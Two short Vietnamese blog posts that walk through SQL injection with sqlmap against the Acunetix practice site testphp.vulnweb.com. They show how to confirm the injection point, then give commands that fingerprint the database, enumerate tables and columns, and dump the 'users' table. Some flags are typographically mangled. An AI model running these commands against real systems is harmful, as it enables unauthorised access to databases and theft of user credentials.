• Security

  Thu thập thông tin Database bằng sqlmap

  Fingerprinting the system and database
  Site: http://testphp.vulnweb.com
  ——

  Link bị lỗi SQL Injection: http://testphp.vulnweb.com/search.php?test=query

  Get database & DB version.

  [email protected]:~# sqlmap -u “http://testphp.vulnweb.com/search.php?test=query” –b

  Get user & role.

  [email protected]:~# sqlmap -u “http://testphp.vulnweb.com/search.php?test=query” –users –roles

  Get current user, current database and hostname information.

  [email protected]:~# sqlmap -u “http://testphp.vulnweb.com/search.php?test=query” –current-user –current-db –hostname

 • Security

  Basic SQL Injection with sqlmap

  SQL Injection with sqlmap
  Site: http://testphp.acunetix.com/

  =======================
  1. Check the URL.

  Chèn thử dấu ‘ phía sau địa chỉ để kiểm tra lỗi: http://testphp.acunetix.com/search.php?test=query’

  Warning: mysql_fetch_array() expects parameter 1 to be resource, boolean given in /hj/var/www/search.php on line 61

  Có lỗi rồi. Mình sẽ dùng sqlmap để kiểm tra.

  [email protected]:~# sqlmap -u “http://testphp.acunetix.com/search.php?test=query” –dbs
  => Lệnh này mình dùng để kiểm tra xem trang web dùng Database tên gì (get database name)

  Cái “information_schema” là DB mặc định của MySQL. Đừng quan tâm đến nó.
  Cái “acuart” là tên của DB trang web, cái chúng ta cần.

  2. Sau khi có tên DB, chúng ta sẽ get Table.

  [email protected]:~# sqlmap -u “http://testphp.acunetix.com/search.php?test=query” –tables D acuart

  sqlmap lấy thông tin khá nhanh.

  3. Get Columns.

  [email protected]:~# sqlmap -u “http://testphp.acunetix.com/search.php?test=query” –columns D acuart

  4. Dump Data.

  Có khá nhiều bảng, mình sẽ lấy dữ liệu của bảng tên là “users”. Trong bảng này thường có nhiều thông tin cần thiết cho việc tấn công.

  [email protected]:~# sqlmap -u “http://testphp.acunetix.com/search.php?test=query” –dump -D acuart -T users

  Đến đây chúng ta đã có được thông tin cần thiết.